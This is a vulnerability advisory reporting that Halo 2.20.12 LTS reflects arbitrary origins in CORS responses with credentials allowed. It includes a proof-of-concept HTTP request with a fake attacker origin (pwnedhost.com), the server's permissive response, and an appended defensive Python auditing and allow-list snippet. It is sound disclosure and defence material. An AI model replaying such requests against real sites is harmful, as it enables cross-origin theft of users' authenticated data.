Halo-2.20.12 LTS CORS Vulnerability

2024.12.25
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Titles: Halo-2.20.12 LTS CORS Vulnerability
## Author: nu11secur1ty
## Date: 12/25/2024
## Vendor: https://www.halo.run/
## Software: https://github.com/halo-dev/halo
## Reference: https://portswigger.net/web-security/cors

## Description:
The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin null.
The application allows two-way interaction from the null origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe.

STATUS: HIGH Vulnerability

[+]PoC:

- CORS:

```
GET /apis/api.halo.run/v1alpha1/comments?group=content.halo.run&kind=Post&name=153c74e9-46c5-4717-b060-c977c200db77&page=1&size=20&version=v1alpha1&withReplies=false&replySize=5 HTTP/2
Host: demo.halo.run
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: XSRF-TOKEN=a0dc5127-b7f7-46ab-941c-86b571611f5a; _ga_Z907HJBP8W=GS1.1.1735151014.1.0.1735151014.0.0.0; _ga=GA1.1.1240519506.1735151014
Referer: https://demo.halo.run/archives/national-security-manager
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Origin: https://pwnedhost.com/
```

[+]Response:

```
HTTP/2 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://pwnedhost.com/
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Content-Type: application/json
Expires: 0
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Strict-Transport-Security: max-age=31536000
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Content-Length: 117
Date: Wed, 25 Dec 2024 21:45:57 GMT

{"page":1,"size":20,"total":0,"items":[],"first":true,"last":true,"hasNext":false,"hasPrevious":false,"totalPages":0}
```

## Reproduce:
[href](https://www.patreon.com/posts/halo-2-20-12-lts-118678773)

## Info:
[href](https://www.nu11secur1ty.com/)

## Time spent:
01:07:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
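
A defender-side check for the behaviour shown in the response above, as an added example that is not part of the original advisory or the Halo code base: `audit_cors` flags an untrusted origin reflected together with `Access-Control-Allow-Credentials: true`, and `cors_headers_for` shows an exact-match allow-list decision. The allow-listed origin `https://blog.example.org` and the function names are assumptions; the sample header lines are copied from the advisory's response.

```python
ALLOWED_ORIGINS = {"https://blog.example.org"}  # assumption: hypothetical trusted origin
# Header lines copied from the response shown in the advisory above.
ADVISORY_RESPONSE = """\
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://pwnedhost.com/
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
"""

def parse_headers(raw):
    """Parse 'Name: value' lines; repeated headers are joined with ', '."""
    headers = {}
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            key, value = name.strip().lower(), value.strip()
            headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return headers

def audit_cors(request_origin, raw_headers, allowed=ALLOWED_ORIGINS):
    """Return findings for the response to a request that sent request_origin."""
    h = parse_headers(raw_headers)
    acao = h.get("access-control-allow-origin")
    if acao is None:
        return []  # no cross-origin grant at all
    findings = []
    if acao == "*":
        findings.append("wildcard origin")
    elif acao == "null":
        findings.append("null origin allowed")
    elif acao == request_origin and acao not in allowed:
        findings.append("untrusted origin reflected")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if creds and findings and acao != "*":
        findings.append("credentials allowed for that origin")
    if acao != "*" and "origin" not in h.get("vary", "").lower():
        findings.append("missing Vary: Origin")
    return findings

def cors_headers_for(origin, allowed=ALLOWED_ORIGINS):
    """Server-side decision: grant CORS only to exact allow-list matches."""
    if origin in allowed:  # "null" and unknown origins get no CORS headers
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}

if __name__ == "__main__":
    print(audit_cors("https://pwnedhost.com/", ADVISORY_RESPONSE))
```
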

